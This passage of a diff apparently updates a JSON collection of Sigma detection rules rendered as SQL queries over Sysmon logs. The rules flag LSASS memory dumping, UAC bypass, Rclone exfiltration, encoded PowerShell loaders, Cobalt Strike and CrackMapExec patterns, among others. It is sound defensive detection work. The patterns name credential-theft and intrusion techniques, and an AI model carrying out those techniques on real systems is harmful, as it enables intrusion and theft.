CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" + "filename": "proc_creation_win_schtasks_change.yml" }, { - "title": "HackTool - SharpUp PrivEsc Tool Execution", - "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", - "status": "experimental", - "description": "Detects the use of SharpUp, a tool for local privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "Non-privileged Usage of Reg or Powershell", + "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", + "status": "test", + "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", + "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.t1615", - "attack.t1569.002", - "attack.t1574.005" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sharpup.yml" + "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" }, { - "title": "DarkSide Ransomware Pattern", - "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "title": "Suspicious Outlook Child Process", + "id": "208748f7-881d-47ac-a29c-07ea84bf691d", "status": "test", - "description": "Detects DarkSide Ransomware and helpers", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious process spawning from an Outlook process.", + "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", "tags": [ "attack.execution", - "attack.t1204" + "attack.t1204.002" ], "falsepositives": [ - "Unknown", - "UAC bypass method used by other malware" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_darkside_ransomware.yml" + "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" }, { - "title": "Time Travel Debugging Utility Usage", - "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", + "title": "Winnti Malware HK University Campaign", + "id": "3121461b-5aa0-4a41-b910-66d25524edbb", "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", + "author": "Florian Roth (Nextron Systems), Markus Neis", "tags": [ "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\tttracer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentImage LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND Image LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\Test.exe' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND Image LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" + "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" }, { - "title": "LSASS Memory Dumping", - "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", - "status": "test", - "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "PUA - CsExec Execution", + "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", + "status": "experimental", + "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.resource_development", + "attack.t1587.001", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\werfault.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" ], - "filename": "proc_creation_win_susp_lsass_dump.yml" + "filename": "proc_creation_win_pua_csexec.yml" }, { - "title": "Exploit for CVE-2015-1641", - "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "title": "Potential Crypto Mining Activity", + "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", "status": "stable", - "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "description": "Detects command line parameters or strings often used by crypto miners", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Unknown" + "Legitimate use of crypto miners", + "Some build frameworks" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2015_1641.yml" + "filename": "proc_creation_win_susp_crypto_mining_monero.yml" }, { - "title": "Renamed BrowserCore.EXE Execution", - "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", - "status": "experimental", - "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Exploit for CVE-2017-8759", + "id": "fdd84c68-a1f6-47c9-9477-920584f94905", + "status": "test", + "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1528", - "attack.t1036.003" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((Image LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_browsercore.yml" + "filename": "proc_creation_win_exploit_cve_2017_8759.yml" }, { - "title": "Manage Engine Java Suspicious Sub Process", - "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", - "status": "experimental", - "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", - "author": "Florian Roth (Nextron Systems)", + "title": "Interactive AT Job", + "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", + "status": "test", + "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "tags": [ + "attack.privilege_escalation", + "attack.t1053.002" + ], "falsepositives": [ - "Legitimate sub processes started by Manage Engine ServiceDesk Pro" + "Unlikely (at.exe deprecated as of Windows 8)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\java.exe%' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_manageengine_pattern.yml" + "filename": "proc_creation_win_at_interactive_execution.yml" }, { - "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", - "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", + "title": "Operator Bloopers Cobalt Strike Modules", + "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", "status": "experimental", - "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" }, { - "title": "HackTool - CrackMapExec Execution Patterns", - "id": "058f4380-962d-40a5-afce-50207d36d7e2", - "status": "stable", - "description": "Detects various execution patterns of the CrackMapExec pentesting framework", - "author": "Thomas Patzke", + "title": "PUA - Nmap/Zenmap Execution", + "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "status": "test", + "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1053", - "attack.t1059.003", - "attack.t1059.001", - "attack.s0106" + "attack.discovery", + "attack.t1046" ], "falsepositives": [ - "Unknown" + "Network administrator computer" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nmap.exe' ESCAPE '\\' OR Image LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" + "filename": "proc_creation_win_pua_nmap_zenmap.yml" }, { - "title": "Suspicious Encoded Obfuscated LOAD String", - "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", - "status": "test", - "description": "Detects suspicious base64 encoded and obbfuscated LOAD string often used for reflection.assembly load", - "author": "pH-T (Nextron Systems)", + "title": "HackTool - GMER Rootkit Detector and Remover Execution", + "id": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", + "status": "experimental", + "description": "Detects the execution GMER tool based on image and hash fields.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\gmer.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=E9DC058440D321AA17D0600B3CA0AB04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173%' ESCAPE '\\') OR md5 = 'e9dc058440d321aa17d0600b3ca0ab04' OR sha1 = '539c228b6b332f5aa523e5ce358c16647d8bbe57' OR sha256 = 'e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173'))" ], - "filename": "proc_creation_win_powershell_base64_load.yml" + "filename": "proc_creation_win_hktl_gmer.yml" }, { - "title": "Adwind RAT / JRAT", - "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", - "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "title": "PUA - Rclone Execution", + "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", + "status": "experimental", + "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", + "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.exfiltration", + "attack.t1567.002" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND CommandLine LIKE '%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((Image LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_malware_adwind.yml" + "filename": "proc_creation_win_pua_rclone_execution.yml" }, { - "title": "Bypass UAC via Fodhelper.exe", - "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", - "status": "test", - "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "Potential Russian APT Credential Theft Activity", + "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", + "status": "stable", + "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ - "Legitimate use of fodhelper.exe utility by legitimate user" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_fodhelper.yml" + "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" }, { - "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", - "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", + "title": "RunDLL32 Spawning Explorer", + "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", "status": "experimental", - "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", + "author": "elhoim, CD_ROM_", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE 